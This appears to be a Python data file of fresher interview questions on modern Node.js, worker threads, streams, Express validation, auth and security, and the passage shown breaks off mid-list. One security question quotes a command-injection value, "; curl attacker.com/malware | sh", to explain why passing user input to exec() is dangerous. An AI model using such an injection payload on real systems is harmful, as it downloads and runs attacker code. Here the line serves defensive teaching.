"""
scripts/backend_additions.py
High-density, verified fresher interview questions to ensure:
- Node.js reaches 215+ questions
- Express.js reaches 215+ questions
- REST API / HTTP reaches 215+ questions
"""

node_extra_items = [
    # Modern Node.js Features & Tools (v18, v20, v22) - 18 Qs
    ("What is native fetch in Node.js (v18+)?", "Node.js v18 introduced the global fetch() API based on Undici, eliminating the need for third-party packages like node-fetch or axios for basic HTTP requests.", "Easy", "Concept", "const res = await fetch('https://api.example.com/data');\nconst data = await res.json();", "Is native fetch available globally in Node 18+?"),
    ("What is the native test runner in Node.js (node:test)?", "Node.js includes a built-in test runner module (node:test) with describe, test/it, and assert, allowing unit testing without installing Jest or Mocha.", "Easy", "Practical", "import test from 'node:test';\nimport assert from 'node:assert';\n\ntest('synchronous passing test', () => {\n  assert.strictEqual(1 + 1, 2);\n});", "How do you run tests using the native runner?"),
    ("How do you run tests using the built-in Node test runner?", "Execute: node --test. Node automatically discovers and runs test files matching *.test.js or *.spec.js.", "Easy", "Practical", "node --test", "What is watch mode in the native test runner?"),
    ("What does the --watch flag do in modern Node.js (v18+)?", "The --watch flag monitors project files and automatically restarts the process or re-runs tests on file changes without needing nodemon.", "Easy", "Practical", "node --watch server.js", "Can --watch replace nodemon for basic use cases?"),
    ("What does the --env-file flag do in Node.js (v20.6+)?", "It allows loading environment variables directly from a .env file without needing the external 'dotenv' npm package.", "Easy", "Practical", "node --env-file=.env server.js", "What happens if a variable is already set in the environment?"),
    ("What is the Web Streams API supported in modern Node.js?", "Node.js implements web-standard ReadableStream, WritableStream, and TransformStream alongside native Node streams, facilitating portable cross-runtime code.", "Intermediate", "Concept", "const stream = new ReadableStream({ ... });", "How do Web Streams differ from Node core streams?"),
    ("What is the difference between Node.js core streams and Web Streams?", "Node streams use EventEmitter with events like 'data' and 'end'. Web Streams use async iterators and reader locks based on WHATWG web standards.", "Intermediate", "Comparison", "", "What is import.meta.resolve in ES Modules?"),
    ("What does import.meta.resolve() do in Node.js ESM?", "It resolves a module specifier relative to the current module URL, returning an absolute file URL.", "Intermediate", "Concept", "const url = import.meta.resolve('./helper.js');", "Is import.meta.resolve synchronous?"),
    ("What is the Permissions Model in Node.js (v20+)?", "An experimental security mechanism (--experimental-permission) that restricts access to the filesystem, child processes, and worker threads at runtime.", "Advanced", "Security", "node --experimental-permission --allow-fs-read=/tmp app.js", "Why is a permissions model useful?"),
    ("What is corepack in Node.js?", "corepack is a zero-runtime tool shipped with Node.js that manages and switches package manager versions (Yarn, pnpm) without manual global installs.", "Easy", "Concept", "corepack enable", "How do you specify the package manager in package.json?"),
    ("What does the 'packageManager' field in package.json do?", "It specifies the exact package manager and version for the project (e.g. 'pnpm@8.6.0') enforced by Corepack.", "Easy", "Practical", "\"packageManager\": \"pnpm@8.6.0\"", "What happens if a developer runs npm instead?"),
    ("What is the diagnostic flag --trace-warnings in Node.js?", "It prints full stack traces for process warnings (such as deprecation warnings) to help locate where the warning originated in code.", "Easy", "Debugging", "node --trace-warnings app.js", "What is --trace-deprecation?"),
    ("What does the flag --trace-sync-io do in Node.js?", "It prints a warning and stack trace whenever synchronous I/O operations are performed during runtime, helping spot accidental event-loop blocking.", "Intermediate", "Debugging", "node --trace-sync-io app.js", "Why is tracing sync I/O important in production?"),
    ("What is AsyncLocalStorage in Node.js?", "AsyncLocalStorage (from async_hooks module) allows storing and propagating request-context state (like user ID or correlation ID) across asynchronous call chains without parameter passing.", "Advanced", "Concept", "const { AsyncLocalStorage } = require('async_hooks');\nconst als = new AsyncLocalStorage();\nals.run({ reqId: '123' }, () => { ... });", "How does AsyncLocalStorage help with request tracing?"),
    ("How does AsyncLocalStorage provide request-scoped tracing?", "It tracks context across async/await and callbacks, allowing loggers deep inside helper functions to access the current request's correlation ID.", "Advanced", "Scenario", "const reqId = als.getStore()?.reqId;\nlogger.info('User query', { reqId });", "Does AsyncLocalStorage introduce significant overhead?"),
    ("Node Modern Features MCQ: Which command flag natively loads environment variables without dotenv in Node.js v20.6+?", "Option B is correct. --env-file loads .env files natively.", "Easy", "MCQ", "", {"A": "--dotenv", "B": "--env-file=.env", "C": "--load-env", "D": "--process-env"}, "B", "When was this introduced?"),
    ("Node Modern Features MCQ: Which flag restarts a Node.js process automatically on file changes in Node.js 18+?", "Option C is correct. --watch monitors files natively.", "Easy", "MCQ", "", {"A": "--nodemon", "B": "--reload", "C": "--watch", "D": "--live"}, "C", "Does it require npm install?"),
    ("Node Modern Features Coding: Use native fetch in Node.js to fetch user data and log the name.", "async function getUser() { const res = await fetch('https://jsonplaceholder.typicode.com/users/1'); const user = await res.json(); console.log(user.name); }", "Easy", "Coding", "async function getUser() {\n  const res = await fetch('https://jsonplaceholder.typicode.com/users/1');\n  if (!res.ok) throw new Error(`HTTP error! status: ${res.status}`);\n  const user = await res.json();\n  console.log(user.name);\n}\ngetUser();", "What does res.ok check?"),

    # Advanced Concurrency & Worker Communication - 18 Qs
    ("What is MessageChannel in worker_threads?", "MessageChannel creates an asynchronous, two-way communications channel between worker threads consisting of port1 and port2.", "Intermediate", "Concept", "const { MessageChannel } = require('worker_threads');\nconst { port1, port2 } = new MessageChannel();", "How is MessagePort used?"),
    ("What is transferList in worker.postMessage(value, [transferList])?", "transferList transfers ownership of binary memory (ArrayBuffer) directly to the receiving thread with zero memory copying (O(1) transfer).", "Advanced", "Concept", "worker.postMessage({ buffer }, [buffer]);", "What happens to the buffer in the sending thread after transfer?"),
    ("What happens to an ArrayBuffer in the sending thread after being transferred via transferList?", "The sending thread's ArrayBuffer becomes detached and neutered; its byteLength becomes 0 and it can no longer be accessed.", "Advanced", "Concept", "", "What is SharedArrayBuffer in Node.js?"),
    ("What is SharedArrayBuffer and how does it differ from ArrayBuffer?", "SharedArrayBuffer allows multiple worker threads to read and write the exact same shared memory region concurrently without copying data.", "Advanced", "Comparison", "const sab = new SharedArrayBuffer(1024);", "What risks occur when multiple threads write to SharedArrayBuffer?"),
    ("What are race conditions in shared memory and how does the Atomics object prevent them?", "When multiple threads modify shared memory simultaneously, values become corrupted. The global Atomics object provides atomic read/write/wait/notify operations that cannot be interrupted.", "Advanced", "Concept", "Atomics.add(typedArray, 0, 1);", "What does Atomics.wait do?"),
    ("What does Atomics.wait() do?", "It puts the calling worker thread to sleep until a specified memory index receives a notification or times out (cannot be called on the main thread).", "Advanced", "Concept", "", "What is process.send() in child processes?",),
    ("How do parent and child processes communicate using process.send?", "When forking via child_process.fork(), an IPC channel is automatically created, allowing JSON message passing via process.send(data) and process.on('message', cb).", "Intermediate", "Practical", "// In child:\nprocess.send({ result: 42 });\n// In parent:\nchild.on('message', msg => console.log(msg));", "What data types can be sent via IPC?"),
    ("What is the difference between fork() and spawn() in child_process?", "fork() is a special spawn() that specifically spawns new Node.js instances with a built-in IPC communication channel. spawn() executes any arbitrary OS executable.", "Intermediate", "Comparison", "", "What does child_process.execSync do and why is it dangerous in servers?"),
    ("Why is child_process.execSync() dangerous in production web services?", "execSync blocks the Node.js main thread completely until the external shell process finishes execution, freezing all user requests.", "Intermediate", "Scenario", "", "What is the maxBuffer option in child_process.exec?",),
    ("What is the maxBuffer option in child_process.exec?", "It specifies the maximum amount of stdout/stderr data (in bytes, default 1MB) allowed before the child process is terminated with an ENOBUFS error.", "Intermediate", "Concept", "exec('cat big.log', { maxBuffer: 10 * 1024 * 1024 }, cb);", "How do you avoid maxBuffer limit?"),
    ("How do you avoid maxBuffer truncation errors when handling large command outputs?", "Use child_process.spawn() and stream the output chunk-by-chunk from child.stdout rather than buffering in memory.", "Intermediate", "Best Practice", "", "Why use spawn for large output?"),
    ("Worker Threads MCQ: Which method transfers memory ownership between threads without copying data?", "Option B is correct. transferList transfers ArrayBuffers with zero-copy.", "Intermediate", "MCQ", "", {"A": "JSON.stringify", "B": "transferList", "C": "Atomics.copy", "D": "process.nextTick"}, "B", "What happens to the sender buffer?"),
    ("Worker Threads MCQ: Which global object provides atomic operations on SharedArrayBuffer in Node.js?", "Option C is correct. The Atomics object guarantees thread-safe operations.", "Intermediate", "MCQ", "", {"A": "ThreadLock", "B": "Mutex", "C": "Atomics", "D": "SyncPool"}, "C", "Can Atomics.wait run on the main thread?"),
    ("Child Process Coding: Spawn a child process to run 'git --version' and capture the output via streams.", "const { spawn } = require('child_process'); const child = spawn('git', ['--version']); child.stdout.on('data', data => console.log(data.toString()));", "Intermediate", "Coding", "const { spawn } = require('child_process');\nconst child = spawn('git', ['--version']);\nchild.stdout.on('data', chunk => {\n  console.log('Git output:', chunk.toString().trim());\n});\nchild.on('close', code => console.log('Exited with code:', code));", "What stream handles errors?"),
    ("Child Process Debugging: Why does child_process.exec('rm -rf ' + req.body.dir) cause a critical vulnerability?", "It is vulnerable to shell command injection: an attacker can supply '; curl attacker.com/malware | sh' to execute arbitrary commands.", "Intermediate", "Security", "// Never pass unsanitized user input to exec()", "How do you fix it?"),
    ("What is the role of worker.terminate() in worker_threads?", "terminate() forcefully stops the worker thread immediately and returns a Promise that resolves when the thread has stopped.", "Intermediate", "Practical", "await worker.terminate();", "Does terminate() allow workers to finish pending work?"),
    ("What is the difference between isMainThread and parentPort in worker_threads?", "isMainThread is a boolean that is true when running on the primary process thread. parentPort is a MessagePort used inside a worker thread to message the main thread.", "Intermediate", "Comparison", "const { isMainThread, parentPort } = require('worker_threads');", "What is parentPort on the main thread?"),

    # Advanced Streams, Sockets & Systems - 16 Qs
    ("What is a Transform stream in Node.js and how do you implement one?", "A Transform stream is a Duplex stream where output is computed from input (e.g. zlib compression, hashing). Implement the _transform(chunk, encoding, callback) method.", "Intermediate", "Concept", "const { Transform } = require('stream');\nconst upper = new Transform({\n  transform(chunk, enc, cb) {\n    cb(null, chunk.toString().toUpperCase());\n  }\n});", "What does the callback in _transform do?"),
    ("What is objectMode in Node.js streams?", "By default, streams process Buffers and Strings. Setting objectMode: true allows streams to emit arbitrary JavaScript objects instead of raw bytes.", "Intermediate", "Concept", "const s = new Transform({ objectMode: true, transform(obj, enc, cb) { cb(null, { ...obj, processed: true }); } });", "How does objectMode affect highWaterMark?"),
    ("How does highWaterMark behave when objectMode is true in Node.js streams?", "In objectMode, highWaterMark measures the count of objects (default 16 objects) rather than bytes (default 64KB).", "Intermediate", "Concept", "", "What is the 'finish' event vs the 'close' event on a Writable stream?"),
    ("What is the difference between 'finish' and 'close' events on a stream?", "'finish' emits after stream.end() is called and all buffered data has flushed to the underlying system. 'close' indicates the underlying resource (file descriptor/socket) has been closed.", "Intermediate", "Comparison", "", "What is the 'net' module in Node.js?",),
    ("What is the 'net' module in Node.js and what does it provide?", "The 'net' module provides APIs for creating stream-based TCP servers (net.createServer) and TCP client sockets (net.connect).", "Intermediate", "Concept", "const net = require('net');\nconst server = net.createServer(socket => {\n  socket.write('Hello TCP\\r\\n');\n  socket.pipe(socket);\n});\nserver.listen(1337);", "How does net differ from http module?"),
    ("What is the difference between the 'net' module and the 'http' module?", "'net' handles raw TCP socket communication (layer 4). 'http' implements the HTTP/1.1 protocol (layer 7) on top of net.Socket.", "Intermediate", "Comparison", "", "What is socket.setKeepAlive(true) in Node.js networking?",),
    ("What does socket.setKeepAlive(enable, [initialDelay]) do in Node.js?", "It enables TCP Keep-Alive probes to detect dead connections and prevent firewalls from dropping idle connections.", "Intermediate", "Practical", "socket.setKeepAlive(true, 60000);", "Why is Keep-Alive important for long-lived sockets?"),
    ("What is socket.destroy([error]) in Node.js?", "It immediately destroys the socket and closes the connection without waiting for pending write operations to complete.", "Easy", "Practical", "socket.destroy();", "How does socket.destroy differ from socket.end?"),
    ("What is the difference between socket.end() and socket.destroy()?", "socket.end() gracefully flushes buffered data before closing the connection (sends FIN packet). socket.destroy() forcefully tears down the socket immediately (sends RST packet).", "Intermediate", "Comparison", "", "What is the 'tls' module in Node.js?",),
    ("What is the 'tls' module in Node.js?", "The 'tls' module provides Transport Layer Security (TLS) and Secure Sockets Layer (SSL) encryption on top of TCP streams.", "Intermediate", "Concept", "const tls = require('tls');", "What files are required to create a secure TLS/HTTPS server?"),
    ("What files are required to create an HTTPS server with the 'https' module?", "A private key file (e.g. key.pem) and a signed SSL/TLS certificate file (e.g. cert.pem).", "Easy", "Practical", "const https = require('https');\nconst fs = require('fs');\nconst options = {\n  key: fs.readFileSync('key.pem'),\n  cert: fs.readFileSync('cert.pem')\n};\nhttps.createServer(options, app).listen(443);", "Why should readFileSync only be used during server startup?"),
    ("Streams Coding: Create a custom Transform stream that converts text to uppercase.", "const { Transform } = require('stream'); const upper = new Transform({ transform(chunk, enc, cb) { cb(null, chunk.toString().toUpperCase()); } });", "Easy", "Coding", "const { Transform } = require('stream');\nconst upperCaseTransform = new Transform({\n  transform(chunk, encoding, callback) {\n    callback(null, chunk.toString().toUpperCase());\n  }\n});\nprocess.stdin.pipe(upperCaseTransform).pipe(process.stdout);", "How do you handle transform errors?"),
    ("Streams MCQ: Which stream event signals that all data has been completely written and flushed to the destination?", "Option B is correct. 'finish' fires on writable streams after all data flushes.", "Easy", "MCQ", "", {"A": "end", "B": "finish", "C": "drain", "D": "close"}, "B", "Which event fires on readable streams?"),
    ("Streams MCQ: What event indicates that a paused writable stream can now accept more data after backpressure?", "Option C is correct. The 'drain' event signals buffer readiness.", "Intermediate", "MCQ", "", {"A": "ready", "B": "flush", "C": "drain", "D": "resume"}, "C", "When does drain fire?"),
    ("What is the 'drain' event on a Writable stream in Node.js?", "When stream.write(chunk) returns false (buffer is full), the stream is experiencing backpressure. The 'drain' event fires when the internal buffer has cleared and it is safe to write again.", "Advanced", "Concept", "if (!stream.write(data)) {\n  stream.once('drain', writeMore);\n}", "Why must backpressure be respected in custom file writers?"),
    ("What is memory leak via stream piping without cleanup?", "Using readable.pipe(writable) without attaching error listeners leaves sockets open and leaks memory if an error occurs. Always use stream.pipeline() instead.", "Intermediate", "Debugging", "const { pipeline } = require('stream/promises');\nawait pipeline(readStream, writeStream);", "Why is pipeline safer than pipe?")
]

express_extra_items = [
    # Request Validation & Schemas (Zod / Joi) - 16 Qs
    ("What is schema validation in Express applications?", "Schema validation validates incoming req.body, req.query, or req.params against predefined rules before controllers run, rejecting malformed requests immediately.", "Easy", "Concept", "", "What popular libraries are used for schema validation in Node/Express?"),
    ("What are the advantages of using Zod for request validation in Express?", "Zod offers zero dependencies, composable schema syntax, automatic TypeScript type inference, and clear structured error messages.", "Easy", "Concept", "import { z } from 'zod';\nconst userSchema = z.object({ email: z.string().email(), age: z.number().min(18) });", "How do you validate req.body with Zod?"),
    ("How do you write an Express middleware to validate req.body with a Zod schema?", "Use schema.parse(req.body) or schema.safeParse(req.body) inside a middleware; if validation fails, return HTTP 400 with the error issues.", "Intermediate", "Practical", "const validate = schema => (req, res, next) => {\n  const result = schema.safeParse(req.body);\n  if (!result.success) return res.status(400).json({ errors: result.error.errors });\n  req.body = result.data;\n  next();\n};", "Why is req.body = result.data a best practice?"),
    ("Why is assigning req.body = result.data after schema validation a security best practice?", "It strips out unknown extra fields that attackers might inject (preventing mass assignment vulnerabilities).", "Intermediate", "Security", "", "What is express-validator and how does it work?",),
    ("What is express-validator in Express applications?", "A set of Express middleware functions wrapping validator.js to sanitize and validate input fields using chainable rules like body('email').isEmail().", "Easy", "Practical", "const { body, validationResult } = require('express-validator');\napp.post('/user', body('email').isEmail(), (req, res) => {\n  const errors = validationResult(req);\n  if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });\n});", "What status code is returned for validation failures?"),
    ("What is the difference between validation and sanitization in Express input handling?", "Validation checks if data conforms to rules (rejects invalid data). Sanitization transforms data to a safe format (e.g. trimming whitespace, normalizing email).", "Easy", "Comparison", "", "What is mass assignment vulnerability in Express?",),
    ("What is a Mass Assignment vulnerability in Express/Mongoose applications?", "When an application blindly passes all req.body properties to User.create(req.body), allowing attackers to set privileged fields like isAdmin: true.", "Intermediate", "Security", "// VULNERABLE:\nawait User.create(req.body);\n// SAFE:\nconst { name, email } = req.body;\nawait User.create({ name, email });", "How do you prevent mass assignment?"),
    ("Validation MCQ: What HTTP status code is standard for returning schema validation errors in REST APIs?", "Option B is correct. 400 Bad Request or 422 Unprocessable Entity are standard.", "Easy", "MCQ", "", {"A": "401 Unauthorized", "B": "400 Bad Request", "C": "403 Forbidden", "D": "404 Not Found"}, "B", "When should 422 be used?"),
    ("Validation Coding: Write an Express route that validates that req.body contains a positive 'amount' and non-empty 'title'.", "app.post('/expense', (req, res) => { const { amount, title } = req.body; if (!title || typeof amount !== 'number' || amount <= 0) return res.status(400).json({ error: 'Invalid input' }); res.status(201).json({ success: true }); });", "Easy", "Coding", "app.post('/api/expenses', (req, res) => {\n  const { amount, title } = req.body;\n  if (!title || typeof title !== 'string' || !title.trim()) {\n    return res.status(400).json({ error: 'Title is required' });\n  }\n  if (typeof amount !== 'number' || amount <= 0) {\n    return res.status(400).json({ error: 'Amount must be a positive number' });\n  }\n  res.status(201).json({ message: 'Expense created' });\n});", "How can this be made reusable with middleware?"),
    ("Validation Debugging: An endpoint checks if (!req.body.age) return res.status(400); Why does this fail for age 0?", "In JavaScript, 0 is falsy, so age 0 triggers the error check incorrectly. Check typeof req.body.age !== 'number' instead.", "Easy", "Debugging", "if (typeof req.body.age !== 'number' || req.body.age < 0) return res.status(400);", "What other values are falsy in JS?"),
    ("What does express.urlencoded({ extended: true }) vs { extended: false } do?", "extended: false uses the querystring library (does not support nested objects). extended: true uses the qs library (supports rich nested objects like user[name]=John).", "Easy", "Comparison", "app.use(express.urlencoded({ extended: true }));", "Which is generally recommended?"),
    ("What happens if express.json() is called AFTER a route handler in app.js?", "The route handler receives req.body as undefined because express.json() has not parsed the body yet. Middleware order matters strictly.", "Easy", "Scenario", "", "Why does middleware ordering matter in Express?"),
    ("Why does middleware order matter in Express?", "Express executes middleware sequentially from top to bottom. If body parsing or authentication is placed after routes, routes will not have parsed bodies or authenticated users.", "Easy", "Concept", "", "What is express.static cacheControl option?",),
    ("How do you configure caching headers for static assets in Express?", "Pass maxAge and setHeaders options to express.static: app.use(express.static('public', { maxAge: '1d' }));.", "Intermediate", "Practical", "app.use(express.static('public', {\n  maxAge: '7d',\n  etag: true\n}));", "What header does maxAge set?"),
    ("What header does express.static({ maxAge: '1d' }) set?", "It sets Cache-Control: public, max-age=86400.", "Easy", "Concept", "", "What is dotfiles option in express.static?",),
    ("What does the 'dotfiles' option in express.static do?", "It controls whether files beginning with a dot (like .env or .git) can be served. Default is 'ignore' (returns 404), preventing secret file leaks.", "Intermediate", "Security", "express.static('public', { dotfiles: 'ignore' })", "Why is 'ignore' the safest option?")
]

express_extra_items_part2 = [
    # Rate Limiting, Authentication & Scaling - 24 Qs
    ("What is express-rate-limit and why is it used?", "express-rate-limit is a middleware that limits repeated requests to public APIs/endpoints (e.g. 100 requests per 15 minutes) to prevent brute-force attacks and DoS.", "Easy", "Concept", "const rateLimit = require('express-rate-limit');\nconst limiter = rateLimit({ windowMs: 15 * 60 * 1000, max: 100 });\napp.use('/api', limiter);", "What status code does rateLimit return?"),
    ("What HTTP status code and header are returned when a rate limit is exceeded?", "HTTP 429 Too Many Requests, along with the 'Retry-After' header indicating seconds to wait.", "Easy", "Concept", "", "Why is an in-memory rate limiter insufficient across multiple server instances?",),
    ("Why should production rate limiters use a Redis store instead of memory?", "When scaling horizontally across multiple Node processes or servers, memory limiters don't share counts. Redis provides a centralized shared count store.", "Intermediate", "Architecture", "const RedisStore = require('rate-limit-redis');\nconst limiter = rateLimit({ store: new RedisStore({ client: redisClient }) });", "What package connects Redis to rateLimit?"),
    ("How do you implement JWT authentication in Express routes?", "Extract the token from req.headers.authorization, verify it with jwt.verify, attach decoded user to req.user, and call next(); return 401 if invalid.", "Easy", "Practical", "const authenticateToken = (req, res, next) => {\n  const token = req.headers.authorization?.split(' ')[1];\n  if (!token) return res.status(401).json({ error: 'Access token required' });\n  jwt.verify(token, process.env.JWT_SECRET, (err, user) => {\n    if (err) return res.status(403).json({ error: 'Invalid or expired token' });\n    req.user = user;\n    next();\n  });\n};", "What is the difference between 401 and 403 in auth?"),
    ("What is the difference between 401 Unauthorized and 403 Forbidden in Express auth?", "401 means the client is unauthenticated (missing or invalid token). 403 means the client is authenticated, but lacks permissions (e.g. role is 'user', requires 'admin').", "Easy", "Comparison", "", "How do you implement Role-Based Access Control (RBAC) middleware in Express?"),
    ("How do you implement Role-Based Access Control (RBAC) middleware in Express?", "Create a higher-order middleware accepting allowed roles that checks req.user.role: if allowed, call next(); else return 403 Forbidden.", "Intermediate", "Practical", "const authorize = (...roles) => (req, res, next) => {\n  if (!roles.includes(req.user?.role)) {\n    return res.status(403).json({ error: 'Access denied: Insufficient permissions' });\n  }\n  next();\n};\n// Usage:\napp.delete('/api/users/:id', authenticateToken, authorize('admin'), deleteUser);", "Why is authorize placed after authenticateToken?"),
    ("Why must role authorization middleware run AFTER authentication middleware?", "Authorization relies on req.user which is populated by the authentication middleware. Running it first results in req.user being undefined.", "Easy", "Scenario", "", "What is express-session and how does it store sessions?"),
    ("What is express-session and how does it store sessions?", "express-session assigns a unique session ID stored in an HttpOnly cookie on the client, while storing session data on the server (memory, Redis, or Mongo).", "Easy", "Concept", "const session = require('express-session');\napp.use(session({ secret: 'keyboard cat', resave: false, saveUninitialized: false }));", "Why is MemoryStore forbidden in production express-session?"),
    ("Why does express-session warn against MemoryStore in production?", "MemoryStore leaks memory, cannot survive process restarts, and cannot share sessions across clustered instances. Use connect-redis or connect-mongo.", "Intermediate", "Scenario", "", "What is cookie-parser middleware in Express?"),
    ("What does cookie-parser middleware do in Express?", "It parses the Cookie header on incoming requests and populates req.cookies with an object keyed by the cookie names.", "Easy", "Practical", "const cookieParser = require('cookie-parser');\napp.use(cookieParser('my-secret')); // Optional signed cookie secret", "What does req.signedCookies contain?"),
    ("What is the difference between req.cookies and req.signedCookies in cookie-parser?", "req.cookies contains raw client cookies. req.signedCookies contains cookies signed with HMAC using a server secret to detect client-side tampering.", "Intermediate", "Comparison", "", "What are the recommended security attributes for authentication cookies in Express?"),
    ("What are the 4 essential security attributes for authentication cookies in res.cookie()?", "1. httpOnly: true (prevents XSS theft). 2. secure: true (transmits only over HTTPS). 3. sameSite: 'strict' or 'lax' (prevents CSRF). 4. maxAge (sets expiration).", "Easy", "Security", "res.cookie('token', jwtToken, {\n  httpOnly: true,\n  secure: process.env.NODE_ENV === 'production',\n  sameSite: 'lax',\n  maxAge: 24 * 60 * 60 * 1000\n});", "Can JavaScript read an httpOnly cookie?"),
    ("Can client-side JavaScript access an HttpOnly cookie via document.cookie?", "No! Browsers block document.cookie access to HttpOnly cookies, protecting them from theft via Cross-Site Scripting (XSS).", "Easy", "Security", "", "What is morgan in Express?"),
    ("What is morgan middleware in Express?", "morgan is an HTTP request logging middleware that logs request details (method, status code, response time) to console or log files.", "Easy", "Practical", "const morgan = require('morgan');\napp.use(morgan('dev')); // Colorized development output", "What are popular morgan formats?"),
    ("What is winston / pino and why are they used instead of console.log in production Express servers?", "They provide structured JSON logging, multiple log levels (info, warn, error), file rotation, and asynchronous non-blocking writes suitable for log aggregators (Datadog/Elastic).", "Intermediate", "Best Practice", "", "What is request correlation ID middleware in microservices?",),
    ("What is a Correlation ID (Request ID) middleware?", "A middleware that assigns a unique UUID to each incoming request (req.headers['x-request-id'] || uuid()) and logs it across all service calls for distributed tracing.", "Intermediate", "Architecture", "app.use((req, res, next) => {\n  req.id = req.headers['x-request-id'] || crypto.randomUUID();\n  res.setHeader('x-request-id', req.id);\n  next();\n});", "Why is x-request-id returned in response headers?"),
    ("Express Security MCQ: Which cookie option prevents client-side JavaScript from accessing session tokens?", "Option B is correct. httpOnly prevents access from document.cookie.", "Easy", "MCQ", "", {"A": "secure", "B": "httpOnly", "C": "sameSite", "D": "path"}, "B", "Which option enforces HTTPS?"),
    ("Express Security MCQ: What HTTP status code should be returned when an unauthenticated user calls a protected endpoint?", "Option A is correct. 401 Unauthorized signals missing or invalid credentials.", "Easy", "MCQ", "", {"A": "401 Unauthorized", "B": "403 Forbidden", "C": "400 Bad Request", "D": "404 Not Found"}, "A", "What does 403 signal instead?"),
    ("Express Auth Coding: Write an Express middleware that checks if req.headers['authorization'] starts with 'Bearer '.", "const checkBearer = (req, res, next) => { const h = req.headers['authorization']; if (!h || !h.startsWith('Bearer ')) return res.status(401).json({ error: 'Bearer token missing' }); next(); };", "Easy", "Coding", "const checkBearer = (req, res, next) => {\n  const authHeader = req.headers['authorization'];\n  if (!authHeader || !authHeader.startsWith('Bearer ')) {\n    return res.status(401).json({ error: 'Authorization header must start with Bearer' });\n  }\n  next();\n};", "How do you extract the raw token string?"),
    ("Express Auth Debugging: Why does jwt.verify throw an error if the token expired?", "jwt.verify throws a TokenExpiredError when Date.now() > token.exp. Catch it and return 401 with { error: 'Token expired' }.", "Easy", "Debugging", "try {\n  const decoded = jwt.verify(token, secret);\n} catch (err) {\n  if (err.name === 'TokenExpiredError') return res.status(401).json({ error: 'Token expired' });\n  return res.status(403).json({ error: 'Invalid token' });\n}", "How do refresh tokens help?"),
    ("What is the Refresh Token rotation pattern?", "Access tokens expire quickly (15 mins). A long-lived refresh token stored in an HttpOnly cookie can request a new access token; each refresh invalidates the old refresh token.", "Intermediate", "Architecture", "", "What is CORS preflight caching?",),
    ("What does the Access-Control-Max-Age header do in CORS responses?", "It specifies how long (in seconds) the browser can cache the preflight OPTIONS response, preventing redundant preflight roundtrips on every request.", "Intermediate", "Concept", "res.setHeader('Access-Control-Max-Age', '86400'); // 24 hours", "What is the maximum preflight cache in Chrome?"),
    ("How do you handle unhandled route paths (404 Not Found) in Express?", "Place a catch-all middleware at the very bottom of all route definitions: app.use((req, res) => res.status(404).json({ error: 'Route not found' }));.", "Easy", "Practical", "app.use((req, res, next) => {\n  res.status(404).json({ error: `Cannot ${req.method} ${req.originalUrl}` });\n});", "Where must this catch-all be placed?"),
    ("Why must the 404 handler be placed after all route definitions?", "If placed before other routes, it will match all requests first and prematurely terminate them with 404.", "Easy", "Scenario", "", "What is express.Router mergeParams option?",),
    ("What does { mergeParams: true } do in express.Router()?", "It preserves the req.params values from the parent router when nesting routes, e.g. allowing child router /users/:userId/posts to access req.params.userId.", "Intermediate", "Practical", "const router = express.Router({ mergeParams: true });", "Why would req.params.userId be undefined without mergeParams?")
]

express_extra_items_part3 = [
    # Architecture, Sub-apps & Production - 22 Qs
    ("What is an Express sub-application (app.use('/admin', adminApp))?", "An Express instance can be mounted inside another Express instance as a sub-app with its own settings, middleware, and routes.", "Intermediate", "Architecture", "const admin = express();\nadmin.get('/', (req, res) => res.send('Admin Home'));\napp.use('/admin', admin);", "What is admin.mountpath?"),
    ("What does app.mountpath return in Express?", "It returns the path pattern on which a sub-app was mounted.", "Intermediate", "Concept", "console.log(admin.mountpath); // '/admin'", "Can sub-apps have their own view engines?"),
    ("What is the difference between app.use(fn) and app.all(path, fn)?", "app.use matches any HTTP verb and paths starting with the prefix. app.all matches any HTTP verb on that exact path only.", "Easy", "Comparison", "app.use('/users', fn); // Matches /users, /users/1, etc.\napp.all('/users', fn); // Matches only exact /users", "When should app.all be used?"),
    ("What is express-async-errors package?", "A utility that automatically patches Express 4 route handlers so rejected promises are automatically forwarded to next(err) without manual try/catch.", "Easy", "Practical", "require('express-async-errors');\n// Now async errors automatically hit error middleware!", "Is this package needed in Express 5?"),
    ("Is express-async-errors needed in Express 5?", "No. Express 5 natively catches rejected promises from route handlers and passes them to the error-handling middleware automatically.", "Easy", "Concept", "", "What is the difference between 301 Moved Permanently and 302 Found in Express res.redirect()?",),
    ("What is the difference between res.redirect(301, url) and res.redirect(302, url)?", "301 tells browsers and search engines the resource moved permanently (browsers cache redirect). 302 is temporary (browsers do not cache redirect). Default is 302.", "Easy", "Comparison", "res.redirect(301, 'https://newsite.com');", "Which redirect transfers SEO ranking?"),
    ("What does res.redirect('back') do in Express?", "It redirects the request back to the URL specified in the HTTP Referer request header, or '/' if no Referer is present.", "Easy", "Practical", "res.redirect('back');", "What security risk exists with open redirects?"),
    ("What is an Open Redirect vulnerability in Express and how do you prevent it?", "An attacker passes an external malicious URL (?redirect=https://evil.com) that the app blindly redirects to. Validate that redirect URLs are relative paths starting with '/'.", "Intermediate", "Security", "const target = req.query.url;\nif (!target.startsWith('/') || target.startsWith('//')) {\n  return res.redirect('/');\n}\nres.redirect(target);", "Why check for '//'?"),
    ("Why must open redirect checks ensure target does not start with '//'?", "Because '//evil.com' is a protocol-relative URL that modern browsers redirect to 'https://evil.com', bypassing naive startsWith('/') checks.", "Advanced", "Security", "", "What is express.static 'index' option?",),
    ("What does the 'index' option in express.static configure?", "It specifies the directory index file to serve automatically (default is 'index.html'). Pass false to disable serving directory indices.", "Easy", "Practical", "express.static('public', { index: false })", "What does disabling index prevent?"),
    ("What is content compression in Express and what types of content should NOT be compressed?", "Compress text-based formats (HTML, CSS, JSON). Do NOT compress already-compressed binary formats (JPEG, PNG, MP4, zip) as it wastes CPU without size reduction.", "Intermediate", "Performance", "", "How does the 'cors' package handle origin verification dynamically?"),
    ("How do you configure dynamic origin validation using the 'cors' package?", "Pass a callback function to the origin option: origin: (origin, callback) => { if (whitelist.includes(origin) || !origin) callback(null, true); else callback(new Error('Blocked by CORS')); }.", "Intermediate", "Security", "const whitelist = ['https://myapp.com'];\nconst corsOptions = {\n  origin: (origin, cb) => {\n    if (!origin || whitelist.includes(origin)) cb(null, true);\n    else cb(new Error('Not allowed by CORS'));\n  }\n};\napp.use(cors(corsOptions));", "Why allow !origin?"),
    ("Why should !origin (empty origin) be allowed in CORS origin checks?", "Server-to-server requests, mobile applications, and curl/Postman tools do not send an Origin header. Blocking !origin breaks native apps and testing.", "Intermediate", "Scenario", "", "What is express-mongo-sanitize middleware?"),
